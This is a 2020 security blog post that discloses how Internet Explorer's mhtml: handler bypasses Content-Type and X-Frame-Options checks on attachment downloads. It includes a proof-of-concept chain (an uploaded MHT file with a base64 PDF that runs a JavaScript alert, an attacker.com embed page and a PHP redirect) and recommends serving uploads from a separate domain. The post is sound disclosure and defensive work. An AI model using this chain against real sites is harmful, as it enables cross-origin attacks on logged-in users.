Sunday, January 26, 2020

Internet Explorer mhtml: - Why you should always store user file uploads on another domain


This blog post is about an issue I discovered some years ago in Internet Explorer. Since exploiting it requires ActiveX plugins such as Adobe PDF or Flash to be installed in IE, I feel comfortable sharing it.

The issue is a combination of the old mhtml: protocol handler and the Content-Disposition: attachment header.
I will try to keep this post short, but since .MHT files and the mhtml: protocol handler are not widely known, I will first explain them briefly. If you are already familiar with them, you can skip ahead to the section about the bug.


MHT/MHTML - MIME Encapsulation of Aggregate HTML Documents


If you have never saved a complete web page in Internet Explorer, MHTML (or its file extension .mht) is most likely unknown to you. MHTML stands for MIME Encapsulation of Aggregate HTML Documents. Wikipedia describes it as a "web page archive format used to combine in a single document the HTML code and its companion resources that are otherwise represented by external links (such as images, Flash animations, Java applets, and audio files)".


Filename: test.mht
Content-Type: multipart/related;
 type="text/html";
 boundary="----=_NextPart_000_0015_01D57001.44159140"

This is a multi-part message in MIME format.  
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test.html

<HTML>
<body>
<h1>32</h1>
</body>
</html>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test2.html

<HTML>
<body>
<h1>test2.html</h1>
</body>
</html>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html;  charset="utf-8"
Content-Transfer-Encoding: base64
Content-Location: base64.html

PGgxPmJhc2U2NDwvaDE+
------=_NextPart_000_0015_01D57001.44159140-- 


You can save this structure with a .mht file extension and open it in Internet Explorer. IE will render the file and show <h1>32</h1>, because that is the first part of the structure.
To reference a specific file inside this structure, the mhtml: protocol handler must be used.

MHTML: Protocol handler 

The general structure of the mhtml: protocol handler looks like this:
mhtml:*Path to MHT file*!*Content-Location name*

Let's assume the example structure shown before is hosted on the following URL:
http://example.com/test.mht


If the test2.html part of the structure has to be loaded, the full URL looks like this:
mhtml:http://example.com/test.mht!test2.html

This tells IE to render the content of this location:
<h1>test2.html</h1>
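The URL scheme above can be illustrated with a small Python sketch that splits an mhtml: URL into the URL of the MHT file and the Content-Location of the requested part. The helper name split_mhtml_url is hypothetical, and splitting at the last "!" is an assumption made here: this post does not say how IE handles a URL that contains more than one "!".

```python
from typing import Tuple


def split_mhtml_url(url: str) -> Tuple[str, str]:
    """Split 'mhtml:<URL of the MHT file>!<Content-Location>' into its halves.

    Assumption: the separator is the LAST '!' in the URL, so a '!' inside the
    MHT file's own URL (e.g. in a query string) stays with that URL.
    """
    scheme = "mhtml:"
    if not url.lower().startswith(scheme):
        raise ValueError("not an mhtml: URL: %r" % url)
    rest = url[len(scheme):]
    mht_url, sep, location = rest.rpartition("!")
    if not sep:
        # No '!' at all: the whole remainder is the MHT URL, no part selected.
        return rest, ""
    return mht_url, location


print(split_mhtml_url("mhtml:http://example.com/test.mht!test2.html"))
# ('http://example.com/test.mht', 'test2.html')
```

The same helper also handles the redirect target used later in this post, where the MHT file is served by a PHP script with a query string.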

If base64.html is referenced, IE base64-decodes its content before rendering it. This behavior is controlled by the part's Content-Transfer-Encoding header.
mhtml:http://example.com/test.mht!base64.html
Base64 decoded HTML structure:
<h1>base64</h1>
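The lookups described above can be reproduced outside IE with Python's standard email package, used here only as a stand-in for IE's MHTML parser (it is not IE's implementation). The sketch uses an abridged copy of test.mht. The helper resolve_part is hypothetical: without a location it returns the first part, mimicking what IE shows when the .mht file is opened directly; otherwise it returns the part whose Content-Location matches, decoded according to its Content-Transfer-Encoding.

```python
from email import message_from_string
from typing import Optional

# Abridged test.mht from above (one line of HTML per part). Folded header
# lines start with a space, as MIME continuation lines must.
TEST_MHT = """Content-Type: multipart/related;
 type="text/html";
 boundary="----=_NextPart_000_0015_01D57001.44159140"

This is a multi-part message in MIME format.
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test.html

<h1>32</h1>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Location: test2.html

<h1>test2.html</h1>
------=_NextPart_000_0015_01D57001.44159140
Content-Type: text/html; charset="utf-8"
Content-Transfer-Encoding: base64
Content-Location: base64.html

PGgxPmJhc2U2NDwvaDE+
------=_NextPart_000_0015_01D57001.44159140--
"""


def resolve_part(mht_text: str, location: Optional[str] = None) -> bytes:
    """Return the decoded body of one part of an MHT document.

    location=None picks the first part (what IE renders for the bare .mht);
    otherwise the part whose Content-Location equals `location` is returned.
    """
    msg = message_from_string(mht_text)
    # walk() yields the multipart root too; only leaf parts carry content.
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    for part in leaves:
        if location is None or part.get("Content-Location") == location:
            # decode=True undoes the part's Content-Transfer-Encoding
            # (base64 or quoted-printable) and returns raw bytes.
            return part.get_payload(decode=True)
    raise KeyError(location)


print(resolve_part(TEST_MHT, "base64.html"))  # b'<h1>base64</h1>'
```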

These examples only showcase HTML files, but the MHTML file structure can store any other type of file as well.
Note that if you want to test these examples, you have to serve the MHT file with the following Content-Type. The reason for this is explained in the next section:
Content-Type: message/rfc822
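One way to serve test.mht with this type for local testing (an assumption, not necessarily the setup used for this post) is Python's built-in http.server with the .mht extension mapped to message/rfc822. The class MhtHandler and the serve() helper are hypothetical names:

```python
from functools import partial
from http.server import HTTPServer, SimpleHTTPRequestHandler


class MhtHandler(SimpleHTTPRequestHandler):
    """Static file handler that serves *.mht files as message/rfc822."""

    # Extend the default extension -> Content-Type map with the MHT type.
    extensions_map = {
        **SimpleHTTPRequestHandler.extensions_map,
        ".mht": "message/rfc822",
    }


def serve(directory: str = ".", host: str = "127.0.0.1", port: int = 8000) -> None:
    """Serve `directory` over HTTP until interrupted (Ctrl+C)."""
    handler = partial(MhtHandler, directory=directory)
    with HTTPServer((host, port), handler) as httpd:
        httpd.serve_forever()
```

Calling serve() in the directory that contains test.mht should make a URL such as mhtml:http://127.0.0.1:8000/test.mht!test2.html resolvable in IE; if IE runs on another machine, bind to a reachable host instead of 127.0.0.1.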

The past and the fix


In the past, Internet Explorer's mhtml: protocol handler implementation did not enforce strict parsing rules.
This behavior was abused in multiple ways. Developers used it as a fallback for IE versions that did not support the data: protocol handler. Attackers abused it to introduce XSS vulnerabilities into websites and to build other attack vectors. The following links are just a short glimpse into the ways the mhtml: protocol handler was abused:

http://www.phpied.com/mhtml-when-you-need-data-uris-in-ie7-and-under/#comment-74091


https://lcamtuf.blogspot.com/2011/03/note-on-mhtml-vulnerability.html


In the end, Microsoft deployed a fix that requires any MHTML file to be served with Content-Type: message/rfc822; otherwise the mhtml: lookup no longer works.

Honorable mention:
In 2017, MHTML was abused once again, this time to trigger a universal XSS vulnerability in Chrome: https://github.com/Bo0oM/CVE-2017-5124

The Bug:  MHTML vs Content-Disposition


I discovered that Internet Explorer ignores the requirement for a correctly set Content-Type header on MHTML files as soon as a Content-Disposition: attachment header is present in the HTTP response. This is not immediately exploitable: although mhtml: can then be used to load a specific resource inside the structure, IE still triggers a download.
To bypass this restriction and actually render the resource in the browser, common Internet Explorer ActiveX plugins like Adobe Flash/PDF can be used.
Internet Explorer allows forcing a resource to be rendered by an installed ActiveX plugin via the embed or object tag, both of which let the page specify the content type. This not only makes IE interpret the resource as an MHT file and load a part of it (e.g. a Flash file), it also means that no download is triggered. Most importantly, the loaded resource is considered to be in the origin http://example.com/, as mhtml: is not treated as part of the Same Origin Policy (*Notes about SOP at the end of this post*):
<embed src="mhtml:http://example.com/test.mht!test.swf" type="application/x-shockwave-flash" />
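The origin claim above can be expressed as a simplified Python model: strip the mhtml: prefix and the !part suffix, then take the (scheme, host, port) of the inner URL. This reflects the behavior as described in this post, not IE's code; effective_origin is a hypothetical helper, and splitting at the last "!" is an assumption.

```python
from typing import Optional, Tuple
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def effective_origin(url: str) -> Tuple[str, str, Optional[int]]:
    """Return (scheme, host, port) for url, unwrapping mhtml: first.

    Model of the behavior described above: a resource loaded via
    mhtml:<inner URL>!<part> ends up in the origin of <inner URL>.
    """
    if url.lower().startswith("mhtml:"):
        inner = url[len("mhtml:"):]
        # Drop the "!<Content-Location>" suffix (assumed: split at the last "!").
        url = inner.rpartition("!")[0] or inner
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)
    return scheme, (parts.hostname or "").lower(), port


embedded = effective_origin("mhtml:http://example.com/test.mht!test.swf")
print(embedded)                                             # ('http', 'example.com', 80)
print(embedded == effective_origin("http://example.com/"))  # True
```

In other words, the embedding page on attacker.com has a different origin than the Flash file it embeds, which is exactly why the embedded file can act on example.com.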

This behavior has another side effect that helps an attacker: IE not only ignores the Content-Type requirement, it also ignores any other security headers. The most common header that would otherwise prevent this attack is X-Frame-Options: deny, which disallows loading the resource in an iframe, embed, object or frame tag.
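The header logic described in this section can be summarized in a small Python model of the mhtml: lookup decision: one function for the rule introduced by Microsoft's fix and one for the behavior described above, where an attachment disposition also unlocks the lookup. Both functions are hypothetical simplifications written from the text of this post, not IE's implementation; they model only whether the lookup happens, not the download prompt or the plugin rendering.

```python
from email.message import Message
from typing import Dict


def _as_message(headers: Dict[str, str]) -> Message:
    """Wrap raw response headers so the email package can parse their values."""
    msg = Message()
    for name, value in headers.items():
        msg[name] = value
    return msg


def lookup_allowed_after_fix(headers: Dict[str, str]) -> bool:
    """Rule after Microsoft's fix: only message/rfc822 enables the lookup."""
    return _as_message(headers).get_content_type() == "message/rfc822"


def lookup_allowed_observed(headers: Dict[str, str]) -> bool:
    """Behavior described in this post: an attachment disposition also enables it.

    X-Frame-Options and X-Content-Type-Options are deliberately not consulted,
    mirroring the observation that IE ignores them on this path.
    """
    msg = _as_message(headers)
    return (msg.get_content_type() == "message/rfc822"
            or msg.get_content_disposition() == "attachment")


# Headers from the example response further below.
SERVED = {
    "Content-Type": "text/plain;charset=UTF-8",
    "Content-Disposition": 'attachment; filename="test.txt"',
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "deny",
}
print(lookup_allowed_after_fix(SERVED), lookup_allowed_observed(SERVED))  # False True
```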

Theoretical real world example:

Let's assume example.com has to serve user-uploaded files on its own origin, and these files can be accessed by any authenticated user. It sets the following HTTP headers for these resources to ensure they are never rendered as active content inside the browser.
It not only enforces a download, but also disallows framing the resource (X-Frame-Options), sets a fixed and safe type (Content-Type) and disables content type sniffing (X-Content-Type-Options):

<?php
header("Content-Type: text/plain");
header('Content-Disposition: attachment; filename="test.txt"');
header("X-Content-Type-Options: nosniff");
header("X-Frame-Options: deny");
echo file_get_contents("userfile.tmp"); // contains the user controlled content
?>

First, an attacker has to upload an MHTML file to example.com. The following example contains a hello world PDF file (which also runs app.alert(URL) when opened), but it can be modified to contain a Flash file as well. Let's assume it is stored at http://example.com/user/123/download.php?id=3:

Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_0000_01D56FF0.D41CF780"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D56FF0.D41CF780
Content-Type: application/pdf;
 charset="Windows-1252"
Content-Transfer-Encoding: base64
Content-Location: abcd.pdf

JVBERi0xLjEKMSAwIG9iago8PAolCS9UeXBlIC9DYXRhbG9nCgkvUGFnZXMgMiAwIFIKICAgIC9B
Y3JvRm9ybSA1IDAgUgogICAgL09wZW5BY3Rpb24gMTIzIDAgUgo+PgplbmRvYmoKMTIzIDAgb2Jq
Cjw8Ci9UeXBlIC9BY3Rpb24KL1MgL0phdmFTY3JpcHQKL0pTIChhcHAuYWxlcnQoVVJMKSkKPj4K
MiAwIG9iago8PAoJL1R5cGUgL1BhZ2VzCgkvQ291bnQgMQoJL0tpZHMgWyAzIDAgUiBdCj4+CmVu
ZG9iagozIDAgb2JqCjw8CgkvVHlwZSAvUGFnZQoJL0NvbnRlbnRzIDQgMCBSCgkvUGFyZW50IDIg
MCBSCgkvUmVzb3VyY2VzIDw8CgkJL0ZvbnQgPDwKCQkJL0YxIDw8CgkJCQkvVHlwZSAvRm9udAoJ
CQkJL1N1YnR5cGUgL1R5cGUxCgkJCQkvQmFzZUZvbnQgL0FyaWFsCgkJCT4+CgkJPj4KCT4+Cj4+
CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggNDc+PgpzdHJlYW0KQlQKL0YxIDEwMApUZiAxIDEg
MSAxIDEgMApUcihIZWxsbyBXb3JsZCEpVGoKRVQKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8
IC9EQSAoL0hlbHYgMCBUZiAwIGcgKSA+PgplbmRvYmoKCnRyYWlsZXIKPDwKCS9Sb290IDEgMCBS
Cj4+CiUlRU9GCiUgYSBuYWl2ZSBQREYgKGZvciBwZGYuanMpIHdpdGggbW9yZSBlbGVtZW50cyB0
aGFuIHVzdWFsbHkgcmVxdWlyZWQKJSBBbmdlIEFsYmVydGluaSwgQlNEIGxpY2VuY2UgMjAxMg==
------=_NextPart_000_0000_01D56FF0.D41CF780--
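Whatever headers example.com attaches, the stored bytes are still a well-formed MIME document. A rough way to flag such uploads is to check whether Python's email parser splits them into parts; looks_like_mhtml is a hypothetical helper, and this is only a heuristic: IE's MHTML parser may accept inputs this check misses, so it is no substitute for serving uploads from another domain.

```python
from email import message_from_bytes


def looks_like_mhtml(data: bytes) -> bool:
    """Heuristic: True if the bytes parse as a MIME container document.

    Python's email parser is only a stand-in for IE's MHTML parser, so a
    False result means "not detected", never "safe".
    """
    msg = message_from_bytes(data)
    # is_multipart() is True when the parser split the body into
    # sub-messages; for multipart/* this requires the declared boundary
    # to actually appear in the body.
    return msg.is_multipart()
```

Running it on the upload above should return True, while plain text or a bare PDF (which starts with %PDF rather than a MIME header) returns False.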


Now an attacker has to lure an authenticated user of example.com to their own domain, e.g. attacker.com, which contains the following HTML structure.
Note: The HTML does not reference the mhtml: protocol handler directly, because this triggers Windows Defender in IE, so an HTTP redirect has to be used (yeah, annoying).

http://attacker.com/test.html
<h1> MHTML protocol test case 2 </h1>
<embed src="redir.php" type="application/pdf" height="500" width="500"/>

redir.php
<?php
header("Location: mhtml:http://example.com/user/123/download.php?id=3!abcd.pdf");

HTTP response of http://example.com/user/123/download.php?id=3 (the target of the redirect):
HTTP/1.1 200 OK
Date: Sat, 25 Jan 2020 00:27:39 GMT
Server: Apache/2.4.37 (Debian)
Content-Disposition: attachment; filename="test.txt"
X-Content-Type-Options: nosniff
X-Frame-Options: deny
Content-Length: 1269
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8

Content-Type: multipart/alternative;
 boundary="----=_NextPart_000_0000_01D56FF0.D41CF780"

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01D56FF0.D41CF780
Content-Type: application/pdf;
 charset="Windows-1252"
Content-Transfer-Encoding: base64
Content-Location: abcd.pdf

JVBERi0xLjEKMSAwIG9iago8PAolCS9UeXBlIC9DYXRhbG9nCgkvUGFnZXMgMiAwIFIKICAgIC9B
Y3JvRm9ybSA1IDAgUgogICAgL09wZW5BY3Rpb24gMTIzIDAgUgo+PgplbmRvYmoKMTIzIDAgb2Jq
Cjw8Ci9UeXBlIC9BY3Rpb24KL1MgL0phdmFTY3JpcHQKL0pTIChhcHAuYWxlcnQoVVJMKSkKPj4K
MiAwIG9iago8PAoJL1R5cGUgL1BhZ2VzCgkvQ291bnQgMQoJL0tpZHMgWyAzIDAgUiBdCj4+CmVu
ZG9iagozIDAgb2JqCjw8CgkvVHlwZSAvUGFnZQoJL0NvbnRlbnRzIDQgMCBSCgkvUGFyZW50IDIg
MCBSCgkvUmVzb3VyY2VzIDw8CgkJL0ZvbnQgPDwKCQkJL0YxIDw8CgkJCQkvVHlwZSAvRm9udAoJ
CQkJL1N1YnR5cGUgL1R5cGUxCgkJCQkvQmFzZUZvbnQgL0FyaWFsCgkJCT4+CgkJPj4KCT4+Cj4+
CmVuZG9iago0IDAgb2JqCjw8IC9MZW5ndGggNDc+PgpzdHJlYW0KQlQKL0YxIDEwMApUZiAxIDEg
MSAxIDEgMApUcihIZWxsbyBXb3JsZCEpVGoKRVQKZW5kc3RyZWFtCmVuZG9iago1IDAgb2JqCjw8
IC9EQSAoL0hlbHYgMCBUZiAwIGcgKSA+PgplbmRvYmoKCnRyYWlsZXIKPDwKCS9Sb290IDEgMCBS
Cj4+CiUlRU9GCiUgYSBuYWl2ZSBQREYgKGZvciBwZGYuanMpIHdpdGggbW9yZSBlbGVtZW50cyB0
aGFuIHVzdWFsbHkgcmVxdWlyZWQKJSBBbmdlIEFsYmVydGluaSwgQlNEIGxpY2VuY2UgMjAxMg==
------=_NextPart_000_0000_01D56FF0.D41CF780--

Despite all the headers set by example.com, Internet Explorer renders the PDF and shows "Hello World". By loading a malicious Flash file instead of a PDF, it is possible to interact with example.com in the context of the victim viewing attacker.com, as the rendered resource still operates in the example.com origin. It must be mentioned that while re-testing this issue, I was only able to reproduce this SOP behavior for Flash files, not for PDF files: Adobe Reader asked me to allow an empty (' ') origin to access example.com.
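The advice in the title can be expressed as a simple check: an uploaded file's URL should not be on the application's domain or any of its subdomains. Subdomains are included because cookies set with Domain=example.com are also sent to them. The sketch below is an illustration under stated assumptions: usercontent.example.net is a hypothetical upload domain, and upload_url and shares_app_domain are hypothetical helpers. mhtml: URLs are unwrapped first, since the embedded resource lands in the origin of the inner URL.

```python
from urllib.parse import urlsplit

APP_HOST = "example.com"                 # the application's own domain
UPLOAD_HOST = "usercontent.example.net"  # hypothetical domain used only for uploads


def upload_url(user_id: int, file_id: int) -> str:
    """Build the download URL of an uploaded file on the separate upload domain."""
    return f"https://{UPLOAD_HOST}/user/{user_id}/download.php?id={file_id}"


def shares_app_domain(url: str, app_host: str = APP_HOST) -> bool:
    """True if url is served from app_host or one of its subdomains."""
    if url.lower().startswith("mhtml:"):
        # An mhtml: resource ends up in the origin of the inner URL.
        url = url[len("mhtml:"):]
    host = (urlsplit(url).hostname or "").lower()
    return host == app_host or host.endswith("." + app_host)


print(upload_url(123, 3))
print(shares_app_domain(upload_url(123, 3)))  # False
```

With uploads served this way, a Flash or PDF file smuggled into an MHT upload would run in the origin of the upload domain rather than in example.com.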